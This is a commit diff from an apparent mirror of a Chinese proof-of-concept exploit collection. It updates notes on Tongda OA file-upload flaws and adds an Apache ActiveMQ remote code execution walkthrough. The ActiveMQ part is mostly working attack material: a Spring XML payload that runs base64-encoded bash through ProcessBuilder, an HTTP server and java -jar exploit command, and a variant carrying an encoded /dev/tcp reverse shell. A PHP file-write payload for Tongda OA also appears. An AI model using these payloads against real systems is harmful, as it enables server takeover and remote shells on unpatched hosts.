admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

更新漏洞

Browse Source
This commit is contained in:
Threekiii 2023-10-30 09:25:20 +08:00
parent ed44f79920
commit 3a81e5cf6d
10 changed files with 123 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
OA产品漏洞/通达OA v11.8 api.ali.php 任意文件上传漏洞.md
View File

@ -2,7 +2,7 @@
## 漏洞描述 ## 漏洞描述
通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器
## 漏洞影响 ## 漏洞影响
@ -37,7 +37,8 @@ Content-Type: application/octet-stream
参数a base解码 参数a base解码
``` ```
ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents('../../fb6790f4.php',''); ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==
file_put_contents('../../fb6790f4.php','');
``` ```
![image-20220520154357492](./images/202205201543536.png) ![image-20220520154357492](./images/202205201543536.png)

5
OA产品漏洞/通达OA v2017 action_upload.php 任意文件上传漏洞.md
View File

@ -1,3 +1,5 @@
# 通达OA v2017 action_upload.php 任意文件上传漏洞
## 漏洞描述 ## 漏洞描述
通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞 通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
@ -64,3 +66,6 @@ submit
再访问上传的文件 再访问上传的文件
![img](./images/202202091053249.png) ![img](./images/202202091053249.png)
利用工具https://github.com/Fu5r0dah/TongdaScan_go

1
README.md
View File

@ -466,6 +466,7 @@
* Apache ActiveMQ Console控制台默认弱口令 * Apache ActiveMQ Console控制台默认弱口令
* Apache ActiveMQ 信息泄漏漏洞 CVE-2017-15709 * Apache ActiveMQ 信息泄漏漏洞 CVE-2017-15709
* Apache ActiveMQ 反序列化漏洞 CVE-2015-5254 * Apache ActiveMQ 反序列化漏洞 CVE-2015-5254
* Apache ActiveMQ远程代码执行
* Apache Axis 远程代码执行漏洞 CVE-2019-0227 * Apache Axis 远程代码执行漏洞 CVE-2019-0227
* Apache Cocoon XML注入 CVE-2020-11991 * Apache Cocoon XML注入 CVE-2020-11991
* Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706 * Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706

113
Web服务器漏洞/Apache ActiveMQ远程代码执行.md Normal file
View File

@ -0,0 +1,113 @@
# Apache ActiveMQ远程代码执行
## 漏洞描述
Apache ActiveMQ 是 Apache 软件基金会研发的一个开源消息中间件,为应用程序提供高效的、可扩展的、稳定的和安全的企业级消息通信。
当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。
更新日期2023-10-25
参考链接:
- https://activemq.apache.org/activemq-5016006-release
- https://github.com/Fw-fW-fw/activemq_Throwable
## 漏洞影响
```
Apache ActiveMQ < 5.18.3
```
## 环境搭建
在 ActiveMQ 官方下载 5.16.6 版本安装包链接https://activemq.apache.org/activemq-5016006-release
解压安装包,在目录 ./apache-activemq-5.16.6/bin/linux-x86-64 下以控制台模式启动,方便排查报错信息,注意使用 jdk 11
```
./activemq console
```
![image-20231027181920007](images/image-20231027181920007.png)
访问 8161 端口管理页面:
![image-20231030090050081](images/image-20231030090050081.png)
## 漏洞复现
编写 poc.xml托管在 8080 端口。开启 http 服务:
```
python3 -m http.server 8080
```
![image-20231027181935525](images/image-20231027181935525.png)
执行命令:
```
touch /tmp/success
-------
base64编码dG91Y2ggL3RtcC9zdWNjZXNz
```
poc.xml注意缩进
```
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>bash</value>
<value>-c</value>
<value>{echo,dG91Y2ggL3RtcC9zdWNjZXNz}|{base64,-d}|{bash,-i}</value>
</list>
</constructor-arg>
</bean>
</beans>
```
使用 [poc](https://github.com/Fw-fW-fw/activemq_Throwable) 进行复现:
```
java -jar activemq_poc.jar 127.0.0.1 61616 http://127.0.0.1:8080/poc.xml
```
成功执行 `touch /tmp/success`
![image-20231027181843920](images/image-20231027181843920.png)
反弹 shell 的 poc.xml
```
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>bash</value>
<value>-c</value>
<value>{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}</value>
</list>
</constructor-arg>
</bean>
</beans>
```
![image-20231030083005877](images/image-20231030083005877.png)
## 修复建议
根据影响版本中的信息排查并升级到安全版本或直接访问参考链接获取官方更新指南。补丁下载链接https://github.com/apache/activemq/tags

BIN
Web服务器漏洞/images/image-20231027181843920.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 59 KiB

BIN
Web服务器漏洞/images/image-20231027181920007.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 191 KiB

BIN
Web服务器漏洞/images/image-20231027181935525.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 42 KiB

BIN
Web服务器漏洞/images/image-20231030083005877.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

BIN
Web服务器漏洞/images/image-20231030090050081.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 73 KiB

BIN
Web服务器漏洞/images/image-20231030091008369.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 22 KiB